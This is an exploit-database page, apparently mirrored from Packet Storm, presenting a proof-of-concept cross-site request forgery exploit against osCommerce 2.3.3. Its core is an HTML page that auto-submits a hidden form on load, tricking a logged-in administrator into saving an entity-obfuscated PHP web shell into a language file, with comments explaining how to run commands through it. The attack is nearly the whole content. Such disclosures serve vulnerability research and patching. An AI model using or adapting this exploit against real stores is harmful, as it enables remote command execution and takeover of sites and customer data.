Lucene search

K

osCommerce 2.3.3 Cross Site Request Forgery

๐Ÿ—“๏ธย 12 Feb 2013ย 00:00:00Reported byย Jakub GalczykTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 21ย Views

Proof Of Concept CSRF in osCommerce 2.3.

Show more
Code
`<?php  
/*  
* this is simple proof-of-c0ncept for csrf in latest  
osCommerce (2.3.3).  
*  
* Admin, after visiting this page, will add php-shell-code to file:  
* ./catalog/includes/languages/english/download.php, so now if we  
* add 'cmd' param to this file, our 'shell' will print command output.  
*  
* --- there should be more this kind of bugs in this webapp.  
* 22.o1.2o13 o/  
*/  
?>  
  
<html><body onload="document.runCSRF.submit();">  
<form method="post" name="runCSRF"  
action="http://oscommerce-2.3.3/catalog/admin/define_language.php?lngdir=english&filename=english/download.php&action=save">  
<input type="hidden" name="file_contents"  
value="&#x3c;&#x3f;&#x70;&#x68;&#x70;&#x20;&#x24;&#x63;&#x6d;&#x64;&#x20;&#x3d;&#x20;&#x24;&#x5f;&#x47;&#x45;&#x54;&#x5b;&#x27;&#x63;&#x6d;&#x64;&#x27;&#x5d;&#x3b;&#x20;&#x65;&#x63;&#x68;&#x6f;&#x20;&#x27;&#x3c;&#x70;&#x72;&#x65;&#x3e;&#x27;&#x20;&#x2e;&#x20;&#x73;&#x68;&#x65;&#x6c;&#x6c;&#x5f;&#x65;&#x78;&#x65;&#x63;&#x28;&#x24;&#x63;&#x6d;&#x64;&#x29;&#x20;&#x2e;&#x20;&#x27;&#x3c;&#x2f;&#x70;&#x72;&#x65;&#x3e;&#x27;&#x3b;&#x20;&#x3f;&#x3e;">  
  
</form>your shell should be here:  
catalog/includes/languages/english/download.php?cmd=id<br></body></html>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
12 Feb 2013 00:00Current
0.9Low risk
Vulners AI Score0.9
21
.json
Report